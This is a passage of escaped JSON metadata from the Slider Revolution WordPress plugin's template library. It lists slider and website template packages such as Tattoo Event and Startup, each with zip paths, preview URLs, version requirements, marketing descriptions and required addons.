V3\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"553\":{\"id\":\"598\",\"title\":\"Projects Modal 3\",\"alias\":\"projects-modal-3\",\"zip\":\"packs\\/projects-modal-3.zip\",\"uid\":\"b22bb57c30e75bf7d7ba7d240a21b3fe\",\"img\":\"projects-modal-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-09-07 15:57:05\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"554\":{\"id\":\"599\",\"title\":\"Urban Street Skate Slider\",\"alias\":\"urban-street-skate-slider\",\"zip\":\"urban-street-skate-slider.zip\",\"uid\":\"14b18e98ac51aa922a264b74518d6f25\",\"img\":\"urban-street-skate-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/urban-street-skate-slider-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=urban-street-skate-slider-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Create catchy presentations with sleek transitions, using this urban-themed slider. A template that\'s perfectly suitable for showcasing products and marketing campaigns!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-09-14 18:54:30\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Modern Slider Design for Your Medical Practice [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-modern-slider-design-for-your-medical-practice\\/\",\"guide_img\":\"tutorial\\/urban-street-skate-slider.png\",\"active\":\"1\",\"installed\":false},\"555\":{\"id\":\"600\",\"title\":\"Fast Food Burger Restaurant Slider\",\"alias\":\"yummy-burgers\",\"zip\":\"yummy-burgers.zip\",\"uid\":\"3de3520af809748281f3aaa16d8c2222\",\"img\":\"yummy-burgers\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/fast-food-burger-restaurant-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fast-food-burger-restaurant-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Make your clients feel hungry with this tasty looking slider, featuring jaw dropping animations and smooth interactions! Easily customizable for showcasing food related products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-10-11 12:47:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Creatively Display Ingredients and Nutrition Info on Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-creatively-display-ingredients-and-nutrition-info-on-your-website\\/\",\"guide_img\":\"tutorial\\/yummy-burgers.png\",\"active\":\"1\",\"installed\":false},\"556\":{\"id\":\"601\",\"title\":\"Tattoo Event Website Template Package\",\"alias\":\"tattoo-event-website-template-package\",\"zip\":\"\",\"uid\":\"tattoo-event-website-template-package\",\"img\":\"packages\\/tattoo_event_website_package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/tattoo-event-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tattoo-event-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">This modern, typography driven, one-page website template is the perfect event landing page. Whether you are looking for a wordpress event website template or a conference website template, Slider Revolution gives you a competitive advantage in event website design.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-10-12 14:37:06\",\"package\":\"Tattoo Event Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Dark Website Design with a Surprising Color Reveal [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-dark-website-design-with-a-surprising-color-reveal\\/\",\"guide_img\":\"tutorial\\/Tattoo-Event-Website.png\",\"active\":\"1\",\"package_id\":\"51\",\"installed\":false},\"557\":{\"id\":\"602\",\"title\":\"Tattoo Event Hero Slider\",\"alias\":\"tattoo-event-hero-slider\",\"zip\":\"packs\\/tattoo-event-hero-slider.zip\",\"uid\":\"3a4eb0f2f1de6b9a644d626c4472208b\",\"img\":\"tattoo-event-hero-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/tattoo-event-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tattoo-event-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This modern, typography driven, one-page website template is the perfect event landing page. Whether you are looking for a wordpress event website template or a conference website template, Slider Revolution gives you a competitive advantage in event website design.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-10-13 11:11:21\",\"package\":\"Tattoo Event Website Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Dark Website Design with a Surprising Color Reveal [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-dark-website-design-with-a-surprising-color-reveal\\/\",\"guide_img\":\"tutorial\\/Tattoo-Event-Website.png\",\"active\":\"1\",\"package_id\":\"51\",\"installed\":false},\"558\":{\"id\":\"603\",\"title\":\"Tattoo Event About\",\"alias\":\"tattoo-event-about\",\"zip\":\"packs\\/tattoo-event-about.zip\",\"uid\":\"ae8aaf2b1aeb84036c35ac3d4a178ed6\",\"img\":\"tattoo-event-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/tattoo-event-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tattoo-event-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This modern, typography driven, one-page website template is the perfect event landing page. Whether you are looking for a wordpress event website template or a conference website template, Slider Revolution gives you a competitive advantage in event website design.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"2021-10-13 11:14:35\",\"package\":\"Tattoo Event Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Dark Website Design with a Surprising Color Reveal [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-dark-website-design-with-a-surprising-color-reveal\\/\",\"guide_img\":\"tutorial\\/Tattoo-Event-Website.png\",\"active\":\"1\",\"package_id\":\"51\",\"installed\":false},\"559\":{\"id\":\"604\",\"title\":\"Tattoo Event Artists\",\"alias\":\"tattoo-event-artists\",\"zip\":\"packs\\/tattoo-event-artists.zip\",\"uid\":\"e11b6508214396963c856afc1b604e58\",\"img\":\"tattoo-event-artists\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/tattoo-event-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tattoo-event-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This modern, typography driven, one-page website template is the perfect event landing page. Whether you are looking for a wordpress event website template or a conference website template, Slider Revolution gives you a competitive advantage in event website design.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"carousel\",\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"2021-10-13 11:16:36\",\"package\":\"Tattoo Event Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Dark Website Design with a Surprising Color Reveal [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-dark-website-design-with-a-surprising-color-reveal\\/\",\"guide_img\":\"tutorial\\/Tattoo-Event-Website.png\",\"active\":\"1\",\"package_id\":\"51\",\"installed\":false},\"560\":{\"id\":\"605\",\"title\":\"Tattoo Event Schedule\",\"alias\":\"tattoo-event-schedule\",\"zip\":\"packs\\/tattoo-event-schedule.zip\",\"uid\":\"73be4b953a719fc9abfadc447e88b906\",\"img\":\"tattoo-event-schedule\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/tattoo-event-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tattoo-event-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This modern, typography driven, one-page website template is the perfect event landing page. Whether you are looking for a wordpress event website template or a conference website template, Slider Revolution gives you a competitive advantage in event website design.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-10-13 11:19:17\",\"package\":\"Tattoo Event Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Dark Website Design with a Surprising Color Reveal [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-dark-website-design-with-a-surprising-color-reveal\\/\",\"guide_img\":\"tutorial\\/Tattoo-Event-Website.png\",\"active\":\"1\",\"package_id\":\"51\",\"installed\":false},\"561\":{\"id\":\"606\",\"title\":\"Tattoo Event News\",\"alias\":\"tattoo-event-news\",\"zip\":\"packs\\/tattoo-event-news.zip\",\"uid\":\"80eafaaaa2f1844cac7c5c1efb0912d1\",\"img\":\"tattoo-event-news\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/tattoo-event-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tattoo-event-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This modern, typography driven, one-page website template is the perfect event landing page. Whether you are looking for a wordpress event website template or a conference website template, Slider Revolution gives you a competitive advantage in event website design.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-10-13 11:21:56\",\"package\":\"Tattoo Event Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Dark Website Design with a Surprising Color Reveal [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-dark-website-design-with-a-surprising-color-reveal\\/\",\"guide_img\":\"tutorial\\/Tattoo-Event-Website.png\",\"active\":\"1\",\"package_id\":\"51\",\"installed\":false},\"562\":{\"id\":\"607\",\"title\":\"Tattoo Event Footer\",\"alias\":\"tattoo-event-footer\",\"zip\":\"packs\\/tattoo-event-footer.zip\",\"uid\":\"0c16f7290794f2e26566c8a8ca8f6493\",\"img\":\"tattoo-event-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/tattoo-event-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tattoo-event-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This modern, typography driven, one-page website template is the perfect event landing page. Whether you are looking for a wordpress event website template or a conference website template, Slider Revolution gives you a competitive advantage in event website design.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-10-13 11:23:18\",\"package\":\"Tattoo Event Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Dark Website Design with a Surprising Color Reveal [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-dark-website-design-with-a-surprising-color-reveal\\/\",\"guide_img\":\"tutorial\\/Tattoo-Event-Website.png\",\"active\":\"1\",\"package_id\":\"51\",\"installed\":false},\"563\":{\"id\":\"608\",\"title\":\"Startup Website Template\",\"alias\":\"startup-website-template\",\"zip\":\"\",\"uid\":\"startup-website-template\",\"img\":\"packages\\/startup-website-template.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:29:34\",\"package\":\"Startup Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"564\":{\"id\":\"609\",\"title\":\"Startup Menu\",\"alias\":\"startup-menu\",\"zip\":\"packs\\/startup-menu.zip\",\"uid\":\"10b7853c05d47a99e61a68ec7ef0a0ea\",\"img\":\"startup-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-11-03 09:32:41\",\"package\":\"Startup Website Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"565\":{\"id\":\"610\",\"title\":\"Startup Hero\",\"alias\":\"startup-hero\",\"zip\":\"packs\\/startup-hero.zip\",\"uid\":\"7a41e68bac8bc7f937b7eb957e01eb11\",\"img\":\"startup-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:34:41\",\"package\":\"Startup Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"zindex=\\\"300\\\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"566\":{\"id\":\"611\",\"title\":\"Startup About\",\"alias\":\"startup-about\",\"zip\":\"packs\\/startup-about.zip\",\"uid\":\"22a816ba986476a36fef3887ff4d1ea1\",\"img\":\"startup-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:36:55\",\"package\":\"Startup Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"zindex=\\\"0\\\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"567\":{\"id\":\"612\",\"title\":\"Startup Features 1\",\"alias\":\"startup-features-1\",\"zip\":\"packs\\/startup-features-1.zip\",\"uid\":\"4b0b7b8773ba30bdc58b862442155faa\",\"img\":\"startup-features-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:39:11\",\"package\":\"Startup Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"zindex=\\\"300\\\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"568\":{\"id\":\"613\",\"title\":\"Startup Features 2\",\"alias\":\"startup-features-2\",\"zip\":\"packs\\/startup-features-2.zip\",\"uid\":\"7a686556ca8c4355fea931b3e946a3d0\",\"img\":\"startup-features-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:40:44\",\"package\":\"Startup Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"zindex=\\\"0\\\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"569\":{\"id\":\"614\",\"title\":\"Startup Team\",\"alias\":\"startup-team\",\"zip\":\"packs\\/startup-team.zip\",\"uid\":\"7969f1f556fd276ec04dcbf49144d2f8\",\"img\":\"startup-team\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:42:12\",\"package\":\"Startup Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"570\":{\"id\":\"615\",\"title\":\"Startup Reviews\",\"alias\":\"startup-reviews\",\"zip\":\"packs\\/startup-reviews.zip\",\"uid\":\"4d5253028165c237cda5f42c3f721c09\",\"img\":\"startup-reviews\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:43:42\",\"package\":\"Startup Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"zindex=\\\"300\\\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons 